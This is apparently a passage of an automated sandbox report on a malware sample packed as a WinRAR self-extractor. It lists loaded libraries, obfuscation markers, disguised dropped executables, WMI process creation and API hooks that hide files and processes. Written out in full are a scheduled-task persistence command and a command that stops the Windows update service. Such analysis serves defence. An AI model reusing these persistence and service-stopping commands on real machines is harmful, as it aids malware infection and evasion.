Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ntmarta.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: coremessaging.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wintypes.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\dialer.exe	Section loaded: ntmarta.dll
Source: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	Section loaded: apphelp.dll

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static file information: File size 6701051 > 1048576

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: GargantuaN.exe, 00000001.00000000.1635712049.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmp, GargantuaN.exe, 00000001.00000003.1637953778.0000000006D7B000.00000004.00000020.00020000.00000000.sdmp, GargantuaN.exe, 00000001.00000003.1638428127.00000000057FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip64\Release\sfxzip.pdb source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000000.1628945437.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp, C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe, 00000000.00000002.1639090059.00007FF7F4D9B000.00000002.00000001.01000000.00000003.sdmp

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

File is packed with WinRar

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

File created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_7103562

Jump to behavior

PE file contains sections with non-standard names

Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: section name: .didat
Source: C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Static PE information: section name: _RDATA
Source: GargantuanS.exe.0.dr	Static PE information: section name: .00cfg
Source: GargantuaN.exe.0.dr	Static PE information: section name: .didat
Source: nhxnqwkhmssh.exe.2.dr	Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6F640 push ecx; ret	1_2_00D6F653
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6EB78 push eax; ret	1_2_00D6EB96
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB96ACDD push rcx; retf 003Fh	7_2_000001B0BB96ACDE
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB99C6DD push rcx; retf 003Fh	7_2_000001B0BB99C6DE
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC4E40D pushfd ; ret	8_2_00007FFD9BC4E422
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BC445D5 push eax; ret	8_2_00007FFD9BC445E9
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE63DD push C181916Ch; ret	8_2_00007FFD9BCE63EE
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE5013 push eax; ret	8_2_00007FFD9BCE5014
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE26E8 push eax; ret	8_2_00007FFD9BCE26EF
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE32B4 push edx; ret	8_2_00007FFD9BCE32B6
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE367D push eax; ret	8_2_00007FFD9BCE367E
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE019B push edx; ret	8_2_00007FFD9BCE019C
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE357F push esp; retf	8_2_00007FFD9BCE3585
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE495A push ecx; ret	8_2_00007FFD9BCE495B
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE315C push edx; ret	8_2_00007FFD9BCE315D
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE146F pushad ; ret	8_2_00007FFD9BCE1470
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE148D pushad ; ret	8_2_00007FFD9BCE14A1
Source: C:\PerfDll\hyperProviderSavesinto.exe	Code function: 8_2_00007FFD9BCE2885 push eax; ret	8_2_00007FFD9BCE2886
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26DACDD push rcx; retf 003Fh	9_2_00000216D26DACDE
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D270C6DD push rcx; retf 003Fh	9_2_00000216D270C6DE
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BD163E3 push C181916Ch; ret	20_2_00007FFD9BD163EE
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BD1357F push esp; retf	20_2_00007FFD9BD13585
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BD1148C pushad ; ret	20_2_00007FFD9BD114A1
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Code function: 20_2_00007FFD9BD1146F pushad ; ret	20_2_00007FFD9BD11470
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E905ACDD push rcx; retf 003Fh	38_2_00000150E905ACDE
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93FC6DD push rcx; retf 003Fh	38_2_00000150E93FC6DE
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE7ACDD push rcx; retf 003Fh	40_2_00000267FCE7ACDE
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCEAC6DD push rcx; retf 003Fh	40_2_00000267FCEAC6DE
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B50ACDD push rcx; retf 003Fh	45_2_000002359B50ACDE
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B53C6DD push rcx; retf 003Fh	45_2_000002359B53C6DE
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC62ACDD push rcx; retf 003Fh	49_2_00000225DC62ACDE

Source: hyperProviderSavesinto.exe.1.dr	Static PE information: section name: .text entropy: 7.557452107884656
Source: KZcLqgnLvRf.exe.8.dr	Static PE information: section name: .text entropy: 7.557452107884656
Source: RuntimeBroker.exe.8.dr	Static PE information: section name: .text entropy: 7.557452107884656
Source: KZcLqgnLvRf.exe0.8.dr	Static PE information: section name: .text entropy: 7.557452107884656
Source: KZcLqgnLvRf.exe1.8.dr	Static PE information: section name: .text entropy: 7.557452107884656

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\PerfDll\hyperProviderSavesinto.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops PE files

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\XVmuemSr.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\phOzxInG.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\LugVktua.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	File created: C:\PerfDll\hyperProviderSavesinto.exe	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\IkSFhrpY.log	Jump to dropped file
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	File created: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Recovery\WmiPrvSE.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\kEwbgeKe.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Recovery\RuntimeBroker.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\vsaRQqFM.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	File created: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\KEMGRwnV.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\zQhPhksn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	File created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\msAjSsFc.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\WiKMUFpI.log	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File created: C:\ProgramData\celaehnmjins\nhxnqwkhmssh.exe

Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe			Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Windows\RemotePackages\RemoteDesktops\KZcLqgnLvRf.exe			Jump to dropped file

Drops files with a non-matching file extension (content does not match file extension)

Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\msAjSsFc.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\WiKMUFpI.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\LugVktua.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\vsaRQqFM.log	Jump to dropped file
Source: C:\PerfDll\hyperProviderSavesinto.exe	File created: C:\Users\user\Desktop\kEwbgeKe.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\IkSFhrpY.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\KEMGRwnV.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\zQhPhksn.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\phOzxInG.log	Jump to dropped file
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	File created: C:\Users\user\Desktop\XVmuemSr.log	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\PerfDll\hyperProviderSavesinto.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "KZcLqgnLvRfK" /sc MINUTE /mo 7 /tr "'C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe'" /f

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

Hooking and other Techniques for Hiding and Protection

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
